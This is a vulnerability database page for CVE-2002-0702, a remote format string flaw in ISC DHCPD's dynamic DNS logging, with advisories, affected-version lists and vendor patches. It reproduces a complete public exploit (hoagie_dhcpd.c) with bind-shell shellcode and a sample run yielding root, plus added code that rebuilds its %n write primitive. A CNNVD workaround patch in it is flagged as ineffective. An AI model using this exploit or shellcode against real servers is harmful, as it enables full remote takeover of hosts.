CVE-2002-0702
CVSS 10.0
Published: 2002-07-26 00:00:00
Revised: 2016-10-17 22:21:32

[Original text] Format string vulnerabilities in the logging routines for dynamic DNS code (print.c) of ISC DHCP daemon (DHCPD) 3 to 3.0.1rc8, with the NSUPDATE option enabled, allow remote malicious DNS servers to execute arbitrary code via format strings in a DNS server response.


[CNNVD] ISC DHCPD Remote Format String Vulnerability (CNNVD-200207-095)

        The Internet Software Consortium (ISC) provides a Dynamic Host Configuration server, DHCPD, a daemon that assigns network addresses and delivers configuration parameters to hosts.
        ISC DHCPD contains a format string vulnerability. A remote attacker can exploit it to execute arbitrary code on the host with the privileges of the DHCPD process (normally root) and so take control of the machine.
        In versions 3 through 3.0.1rc8, DHCPD has the NSUPDATE option enabled by default. With it, the DHCP server sends host-related information to the DNS server once it has processed a DHCP request. The DNS server answers with an acknowledgement, and that message may contain user-supplied data. On receiving the acknowledgement, the DHCP server records the outcome through a syslog call, and that logging call is where the format string bug sits: a remote attacker who controls the DNS reply can execute arbitrary code on the host and take control of it. The flaw is in common/print.c; the affected code is:
        if (errorp)
         log_error (obuf);
        else
         log_info (obuf);
        "obuf" may contain attacker-supplied data, so an attacker can place "%n" directives in obuf to carry out a format string attack.


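The logging call quoted above, as an added example written for this page (it is not ISC DHCP code and not part of the CNNVD entry): a printf-style logger is called once the way the vulnerable print.c does, with the message built from the DNS update used as the format string, and once the way the patched code does, with a literal "%s" format. The logger log_line, the wrappers log_line_unsafe and log_line_safe, the audit helper count_format_directives, the message prefix and the name host.example.%08x are all constructed for the demonstration; the unsafe path is handed one spare argument so that the attacker's %08x has something defined to print, which a real caller would not have.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical printf-style logger standing in for ISC's log_info()/log_error();
 * it formats into `out` instead of calling syslog so the result can be inspected. */
static void log_line(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, n, fmt, ap);
    va_end(ap);
}

/* Vulnerable shape, as in print.c before the fix: the message assembled from
 * the DNS update is itself the format string. One spare argument is passed
 * here only to keep the demonstration defined behaviour; the real call site
 * passes none, so %x reads and %n writes whatever the stack holds. */
static void log_line_unsafe(char *out, size_t n, const char *obuf)
{
    log_line(out, n, obuf, 0x41414141u);
}

/* Patched shape: the format is a literal and obuf is only ever an argument. */
static void log_line_safe(char *out, size_t n, const char *obuf)
{
    log_line(out, n, "%s", obuf);
}

/* Audit helper: number of conversion directives a string would carry into a
 * printf-family call ("%%" is a literal percent sign and does not count).
 * Anything non-zero on data that is about to be used as a format is the bug. */
static int count_format_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {
            s++;
            continue;
        }
        count++;
    }
    return count;
}

/* Assembles the log message the way the advisory describes: a fixed prefix
 * plus the name that reached the server (from the client's fqdn option or the
 * DNS server's reply), then hands it to one of the two loggers. Returns the
 * rendered log line. */
static const char *render_update_log(const char *dns_name, int patched)
{
    static char obuf[256], out[256];

    snprintf(obuf, sizeof obuf, "ddns update of %s: ", dns_name);
    if (patched)
        log_line_safe(out, sizeof out, obuf);
    else
        log_line_unsafe(out, sizeof out, obuf);
    return out;
}

int main(void)
{
    /* Constructed name carrying a directive, as a hostile peer could send it. */
    const char *evil_name = "host.example.%08x";

    printf("directives in message: %d\n", count_format_directives(evil_name));
    printf("unpatched: %s\n", render_update_log(evil_name, 0));
    printf("patched:   %s\n", render_update_log(evil_name, 1));
    return 0;
}
```

With the unpatched call the directive is consumed and the line reads "ddns update of host.example.41414141: "; with the patched call the name is logged verbatim. Declaring log_line with __attribute__((format(printf, 3, 4))) and building with -Wformat -Wformat-security makes gcc report the log_line_unsafe call site, which is the cheap check to run across a code base for this bug class.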
- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:isc:dhcpd:3.0          ISC DHCPD 3.0
cpe:/a:isc:dhcpd:3.0.1:rc1    ISC DHCPD 3.0.1 rc1
cpe:/a:isc:dhcpd:3.0.1:rc2    ISC DHCPD 3.0.1 rc2
cpe:/a:isc:dhcpd:3.0.1:rc3    ISC DHCPD 3.0.1 rc3
cpe:/a:isc:dhcpd:3.0.1:rc4    ISC DHCPD 3.0.1 rc4
cpe:/a:isc:dhcpd:3.0.1:rc5    ISC DHCPD 3.0.1 rc5
cpe:/a:isc:dhcpd:3.0.1:rc6    ISC DHCPD 3.0.1 rc6
cpe:/a:isc:dhcpd:3.0.1:rc7    ISC DHCPD 3.0.1 rc7
cpe:/a:isc:dhcpd:3.0.1:rc8    ISC DHCPD 3.0.1 rc8

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0702
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0702
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-095
(official data source) CNNVD

- Other links and resources

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-028.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-028.0
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0063.html
(UNKNOWN)  VULNWATCH  20020508 [VulnWatch] [NGSEC-2002-2] ISC DHCPDv3, remote root compromise
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000483
(UNKNOWN)  CONECTIVA  CLA-2002:483
http://marc.info/?l=bugtraq&m=102089498828206&w=2
(UNKNOWN)  BUGTRAQ  20020508 [NGSEC-2002-2] ISC DHCPDv3, remote root compromise
http://www.cert.org/advisories/CA-2002-12.html
(VENDOR_ADVISORY)  CERT  CA-2002-12
http://www.iss.net/security_center/static/9039.php
(VENDOR_ADVISORY)  XF  dhcpd-nsupdate-format-string(9039)
http://www.kb.cert.org/vuls/id/854315
(UNKNOWN)  CERT-VN  VU#854315
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-037.php
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2002:037
http://www.novell.com/linux/security/advisories/2002_19_dhcp.html
(UNKNOWN)  SUSE  SuSE-SA:2002:019
http://www.securityfocus.com/bid/4701
(VENDOR_ADVISORY)  BID  4701

- Vulnerability Information

ISC DHCPD Remote Format String Vulnerability
Critical    Input validation
Published: 2002-07-26 00:00:00    Updated: 2005-10-20 00:00:00
Remote


- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade right away, CNNVD recommends the following measure to reduce the threat:
        * Apply the patch below to the source, rebuild and restart the daemon:
         --- common/print.c Tue Apr 9 13:41:17 2002
         +++ common/print.c.patched Tue Apr 9 13:41:56 2002
         @@ -1366,8 +1366,8 @@
         *s++ = '.';
         *s++ = 0;
         if (errorp)
         - log_error (obuf);
         + log_error ("",obuf);
         else
         - log_info (obuf);
         + log_info ("",obuf);
         }
         #endif /* NSUPDATE */
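        Review bot: the two `+` lines of this hunk do not fix the bug, they silence the message: `log_error ("",obuf);` and `log_info ("",obuf);` hand an empty format string to the logger, so obuf becomes an unused extra argument and nothing useful is written to syslog. The change needed is a literal format that consumes obuf as data, `log_error ("%s",obuf);` and `log_info ("%s",obuf);`, which is what the ISC patch reproduced further down this page contains; anyone applying this workaround by hand should use that form.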
        Vendor patch:
        ISC
        ---
        The vendor has released a fixed version, 3.0pl1, for this issue, and the fix is also included in the next release, 3.0.1RC9. Download it from the vendor's site:
        
        http://www.isc.org/products/DHCP/

- Vulnerability Information (21440)

ISC DHCPD 2.0/3.0.1 NSUPDATE Remote Format String Vulnerability (EDBID:21440)
Platform: bsd    Type: remote
Date: 2002-05-08    Verified
Port: 0    Author: andi
source: http://www.securityfocus.com/bid/4701/info

The ISC DHCPD (Dynamic Host Configuration Protocol) is a collection of software implementing the DHCP protocol. It is available for a range of operating systems, including BSD and Solaris.

A remote format string vulnerability has been reported in multiple versions of the DHCPD server. User supplied data is logged in an unsafe fashion. Exploitation of this vulnerability may result in arbitrary code being executed by the DHCP server, which generally runs as the root user.

This vulnerability is dependent on the NSUPDATE configuration option being enabled. NSUPDATE is enabled by default in versions 3.0 and later of the DHCPD server.

/***********************************************************
 * hoagie_dhcpd.c
 *
 * local and remote exploit for isc dhcpd 3.0 (perhaps others)
 *
 * hi 19c3 guys ;)
 *
 * gcc hoagie_dhcpd.c -o hoagie_dhcpd
 *
 * Author: Andi <andi@void.at>
 *
 * Greetz to Greuff, philipp and the other hoagie-fellas :-)
 *
 * For this exploit we use the very very useful dhcp client
 * option: hex-colon list as fqdn. For this trick we change
 * in common/tables.c the parsing option to "X". 
 *
 * # ./hd 
 * hoagie_dhcpd.c - remote isc dhcpd 3.0 format string exploit
 * using return address location: 0xbfffdd4c
 * return address: 0xbfffde38
 * dummy vprintf address: 0xbfffdd70
 * now run: dhclient -d -cf dhcp.conf eth0
 * # ./dhclient -d -cf dhcp.conf eth0
 * Internet Software Consortium DHCP Client V3.0
 * Copyright 1995-2001 Internet Software Consortium.
 * All rights reserved.
 * For info, please visit http://www.isc.org/products/DHCP
 * 
 * Listening on LPF/eth0/00:02:3f:af:89:fb
 * Sending on   LPF/eth0/00:02:3f:af:89:fb
 * Sending on   Socket/fallback
 * DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3
 * DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval ...
 * ^C
 * # telnet dhcpserverip 10000
 * id;
 * uid=0(root) gid=0(root) groups=0(root)
 *
 * after I've written the return address location and used the
 * last %n parameter, vfprintf still pops values from the stack
 * so what happened: the dhcp server tries to write the written
 * bytes to something like 0x2578.... which is part of the format
 * string. so you have to add another dummy address pair where
 * vfprintf can write dummy bytes.
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY 
 * DAMAGE DONE USING THIS PROGRAM.
 *
 ************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strcpy, strcat, strlen, memset */
#include <unistd.h>     /* getopt, optarg */

char shellcode[] = 
   "\x31\xdb"			// xor	ebx, ebx
   "\xf7\xe3"			// mul	ebx
   "\xb0\x66"			// mov     al, 102
   "\x53"			// push    ebx
   "\x43"			// inc     ebx
   "\x53"			// push    ebx
   "\x43"			// inc     ebx
   "\x53"			// push    ebx
   "\x89\xe1"			// mov     ecx, esp
   "\x4b"			// dec     ebx
   "\xcd\x80"			// int     80h
   "\x89\xc7"			// mov     edi, eax
   "\x52"			// push    edx
   "\x66\x68\x27\x10"		// push    word 4135
   "\x43"			// inc     ebx
   "\x66\x53"			// push    bx
   "\x89\xe1"			// mov     ecx, esp
   "\xb0\x10"			// mov	al, 16
   "\x50"			// push	eax
   "\x51"			// push    ecx
   "\x57"			// push    edi
   "\x89\xe1"			// mov     ecx, esp
   "\xb0\x66"			// mov     al, 102
   "\xcd\x80"			// int     80h
   "\xb0\x66"			// mov     al, 102
   "\xb3\x04"			// mov     bl, 4
   "\xcd\x80"			// int     80h
   "\x50"			// push	eax
   "\x50"			// push	eax
   "\x57"			// push	edi
   "\x89\xe1"			// mov	ecx, esp
   "\x43"			// inc	ebx
   "\xb0\x66"			// mov	al, 102
   "\xcd\x80"			// int	80h
   "\x89\xd9"			// mov	ecx, ebx
   "\x89\xc3"			// mov     ebx, eax
   "\xb0\x3f"			// mov     al, 63
   "\x49"			// dec     ecx
   "\xcd\x80"			// int     80h
   "\x41"			// inc     ecx
   "\xe2\xf8"			// loop    lp
   "\x51"			// push    ecx
   "\x68\x6e\x2f\x73\x68"	// push    dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push    dword 69622f2fh
   "\x89\xe3"			// mov     ebx, esp
   "\x51"			// push    ecx
   "\x53"			// push	ebx
   "\x89\xe1"			// mov	ecx, esp
   "\xb0\x0b"			// mov	al, 11
   "\xcd\x80";			// int     80h

char nop[] = "\x90\x90\x90\x90";

int retloc = 0xbfffdd4c;		/* use gdb to get it ;) */
int retaddr = 0xbfffde38;		/* hmm yes that sounds quite interesting */
int dummyaddr = 0xbfffdd70;		/* dummy stack pointer for vprintf */

void help() {
    printf("\t-l\t ... return address location\n");
    printf("\t-r\t ... return address\n");
    printf("\t-d\t ... dummy vfprintf address\n");
    exit(0);
} 

int main(int argc, char **argv) {
    char buffer[4096], output[4096], tmp[6], pad[4][20];
    FILE *fp;
    unsigned char rl[4], ra[4], da[4]; 
    int i, opt;
    unsigned int start, diff, ret;
    extern char *optarg;

    printf("hoagie_dhcpd.c - remote isc dhcpd 3.0 format string exploit\n");
    if (argc > 1) {
       while ( (opt = getopt(argc, argv, "hl:r:d:")) != EOF) {
          switch(opt) {
             case 'h': help(); break;
             case 'l': sscanf(optarg, "0x%x", &retloc); break;
             case 'r': sscanf(optarg, "0x%x", &retaddr); break;
             case 'd': sscanf(optarg, "0x%x", &dummyaddr); break;
          }
       }
    }
    printf("using return address location: 0x%x\n", retloc);
    printf("return address: 0x%x\n", retaddr); 
    printf("dummy vprintf address: 0x%x\n", dummyaddr);

    /* convert return address location */
    rl[0] = (char) (retloc >> 24);
    rl[1] = (char) (retloc >> 16);
    rl[2] = (char) (retloc >> 8);
    rl[3] = (char) retloc;

    /* convert dummy address */
    da[0] = (char) (dummyaddr >> 24);
    da[1] = (char) (dummyaddr >> 16);
    da[2] = (char) (dummyaddr >> 8);
    da[3] = (char) dummyaddr;

    /* calculate paddings */
    ra[3] = (char) (retaddr >> 24);
    ra[2] = (char) (retaddr >> 16);
    ra[1] = (char) (retaddr >> 8);
    ra[0] = (char) retaddr;

    start = 0xd4;
    for (i = 0; i < 4; i++) {
       if (start == ra[i]) {
          strcpy(pad[i], "");
       } else {
          if (start > ra[i]) {
             ret = ra[i];
             while (start > ret) ret += 0x100;
             diff = ret - start;
          } else {
	     diff = ra[i] - start;
          }
          sprintf(pad[i], "%%%du", diff); 
          start += diff;
       }
    }

    /* build the special format string */
    sprintf(buffer, 
            "%c%c%c%c\x70\xdd\xff\xbf%c%c%c%c\x70\xdd\xff\xbf"
            "%c%c%c%c\x70\xdd\xff\xbf%c%c%c%c"
            "%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x"
            "%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x" 
            "\x90\x90\x90\x90%c%c%c%c"
            "\x90\x90\x90\x90%c%c%c%c"
            "\x90\x90\x90\x90%c%c%c%c"
            "\x90\x90\x90\x90%c%c%c%c"
            "%s%%n" 
            "%s%%n"
            "%s%%n" 
            "%s%%n" 
	    "%s%s", 
            rl[3], rl[2], rl[1], rl[0], 
            rl[3] + 1, rl[2], rl[1], rl[0], 
            rl[3] + 2, rl[2], rl[1], rl[0],
            rl[3] + 3, rl[2], rl[1], rl[0], 
            da[3], da[2], da[1], da[0],
            da[3], da[2], da[1], da[0],
            da[3], da[2], da[1], da[0],
            da[3], da[2], da[1], da[0],
            pad[0], pad[1], pad[2], pad[3], nop, shellcode);

    /* convert to dhcp.conf syntax
     * hex style input format rules -> change your dhclient source -> tables.c and change fqdn to type X
     * to add binary values 
     */
    memset(output, 0, sizeof(output));
    for (i = 0; i < strlen(buffer) - 1; i++) {
        sprintf(tmp, "%02x:", (unsigned char)buffer[i]);
        strcat(output, tmp);
    }
    sprintf(tmp, "%02x", (unsigned char)buffer[i]);
    strcat(output, tmp);

    /* create dhcp.conf and write options */
    fp = fopen("dhcp.conf", "w");
    if (fp == NULL) {
        perror("dhcp.conf");
        return 1;
    }
    fprintf(fp, "send fqdn.server-update on;\n");
    fprintf(fp, "send fqdn.fqdn %s;", output);
    fclose(fp);

    /* have fun */
    printf("now run: dhclient -d -cf dhcp.conf eth0\n");
    return 0;
}


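The pad calculation in the exploit above (the start/diff loop that emits "%<diff>u" before each "%n") and the write primitive it drives, as an added example written for this page rather than code taken from the exploit or from ISC DHCP. It keeps the format a literal, passes the widths through "%*u" and stores single bytes with "%hhn", so the four stores are defined behaviour in an ordinary program and are not rejected by glibc's fortify check on "%n" in writable format strings; the exploit instead embeds the widths in the attacker string and aims four overlapping "%n" stores at retloc, retloc+1, retloc+2 and retloc+3. The names split_le, compute_pads, pad_at, write_u32_via_hhn, read_u32_le and roundtrip are hypothetical; 0xd4 and 0xbfffde38 are the exploit's own start count and default return address.

```c
#include <stdio.h>

/* Splits a 32-bit value into the four bytes the exploit writes at retloc,
 * retloc+1, retloc+2, retloc+3 (little-endian, as on its x86 target). */
static void split_le(unsigned value, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(value >> (8 * i));
}

/* Mirrors the exploit's start/diff loop: before each %n, print enough
 * characters that the low byte of the running count equals the next target
 * byte. `count` is how many characters precede the first pair (0xd4 in the
 * exploit: the address quadruples plus the %08x stack pops). */
static void compute_pads(unsigned count, const unsigned char target[4], int widths[4])
{
    for (int i = 0; i < 4; i++) {
        unsigned diff = (target[i] - count) & 0xffu;
        /* %*u of the value 0 prints max(width, 1) characters, so a zero
         * difference has to go once around the byte. */
        widths[i] = diff ? (int)diff : 256;
        count += (unsigned)widths[i];
    }
}

/* Pad width the exploit would choose for byte i of `value`. */
static int pad_at(unsigned count, unsigned value, int i)
{
    unsigned char t[4];
    int w[4];

    split_le(value, t);
    compute_pads(count, t, w);
    return w[i];
}

/* The write primitive itself: four "%*u%hhn" pairs in one call store the
 * bytes of `value` into dest[0..3], just as the exploit's four %n stores
 * assemble a return address at retloc. Returns the number of characters
 * the format produced. */
static int write_u32_via_hhn(unsigned char dest[4], unsigned value)
{
    unsigned char t[4];
    int w[4];
    char out[1100];                       /* worst case is 4 * 256 characters */

    split_le(value, t);
    compute_pads(0, t, w);
    return snprintf(out, sizeof out, "%*u%hhn%*u%hhn%*u%hhn%*u%hhn",
                    w[0], 0u, (signed char *)&dest[0],
                    w[1], 0u, (signed char *)&dest[1],
                    w[2], 0u, (signed char *)&dest[2],
                    w[3], 0u, (signed char *)&dest[3]);
}

/* Reads back what landed in memory. */
static unsigned read_u32_le(const unsigned char b[4])
{
    return (unsigned)b[0] | (unsigned)b[1] << 8 | (unsigned)b[2] << 16 | (unsigned)b[3] << 24;
}

/* Writes `value` through the primitive and returns what the memory holds. */
static unsigned roundtrip(unsigned value)
{
    unsigned char mem[4] = {0, 0, 0, 0};

    write_u32_via_hhn(mem, value);
    return read_u32_le(mem);
}

int main(void)
{
    unsigned retaddr = 0xbfffde38u;       /* the exploit's default return address */

    printf("pads from count 0xd4 for 0x%08x: %d %d %d %d\n", retaddr,
           pad_at(0xd4, retaddr, 0), pad_at(0xd4, retaddr, 1),
           pad_at(0xd4, retaddr, 2), pad_at(0xd4, retaddr, 3));
    printf("memory after the four %%hhn stores: 0x%08x\n", roundtrip(retaddr));
    return 0;
}
```

For 0xbfffde38 from a start count of 0xd4 the widths come out as 100, 166, 33 and 192, the same values the exploit's loop produces for its defaults, and the round trip through the four stores reproduces the address byte for byte. The exploit prints a popped stack value rather than 0 with each %u, so whenever that value has more digits than the requested width the running count overshoots and the stored byte is wrong; that is why its addresses have to be re-derived with gdb per target rather than computed once.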
- Vulnerability Information

14433
ISC DHCP Daemon NSUPDATE Logging Routine Format String Remote Code Execution
Location: Local / Remote    Attack type: Input Manipulation
Impact: Loss of Integrity    Solution: Upgrade
Disclosure: Vendor Verified

- Vulnerability Description

- Timeline

2002-05-08 Unknown
2002-05-08 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

ISC DHCPD NSUPDATE Remote Format String Vulnerability
Class: Input Validation Error    Bugtraq ID: 4701
Remote: Yes    Local: No
Published: 2002-05-08 12:00:00    Updated: 2009-07-11 12:46:00
Discovered by Fermín J. Serna <fjserna@ngsec.com>.

- Affected versions

ISC DHCPD 3.0.1 rc8
ISC DHCPD 3.0.1 rc7
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1.1
ISC DHCPD 3.0.1 rc6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
ISC DHCPD 3.0.1 rc5
ISC DHCPD 3.0.1 rc4
+ OpenPKG OpenPKG 1.0
ISC DHCPD 3.0.1 rc3
ISC DHCPD 3.0.1 rc2
ISC DHCPD 3.0.1 rc1
ISC DHCPD 3.0
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
- S.u.S.E. Linux 8.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux Connectivity Server
- S.u.S.E. Linux Database Server 0
- S.u.S.E. Linux Enterprise Server for S/390
- S.u.S.E. SuSE eMail Server III
- SuSE SUSE Linux Enterprise Server 7
ISC DHCPD 2.0.pl5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha

- Not affected versions

ISC DHCPD 3.0.1 rc9
+ Conectiva Linux Enterprise Edition 1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ OpenPKG OpenPKG 1.1
+ S.u.S.E. Linux 8.1
ISC DHCPD 3.0 pl1
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ Slackware Linux 8.1

- Vulnerability Discussion


- Exploitation

Exploits available:

- Solution

ISC has provided the following patch:

--- common/print.c Tue Apr 9 13:41:17 2002
+++ common/print.c.patched Tue Apr 9 13:41:56 2002
@@ -1366,8 +1366,8 @@
*s++ = '.';
*s++ = 0;
if (errorp)
- log_error (obuf);
+ log_error ("%s",obuf);
else
- log_info (obuf);
+ log_info ("%s",obuf);
}
#endif /* NSUPDATE */
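Review bot: correct fix; the `"%s"` literal on both `+` lines turns obuf into an argument, so any `%n` or `%x` in the DNS-derived name is printed rather than interpreted. Worth adding in the same patch: mark log_error and log_info with `__attribute__ ((format (printf, 1, 2)))` if their declarations lack it, so that gcc with -Wformat -Wformat-security reports every remaining call that passes a non-literal as the first argument; that is how any other instance of this pattern in the logging routines gets found instead of waiting for the next advisory.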

Updated versions are available for:

ISC DHCPD 3.0
ISC DHCPD 3.0.1 rc1
ISC DHCPD 3.0.1 rc2
ISC DHCPD 3.0.1 rc3
ISC DHCPD 3.0.1 rc4
ISC DHCPD 3.0.1 rc5
ISC DHCPD 3.0.1 rc6
ISC DHCPD 3.0.1 rc7
ISC DHCPD 3.0.1 rc8

- References
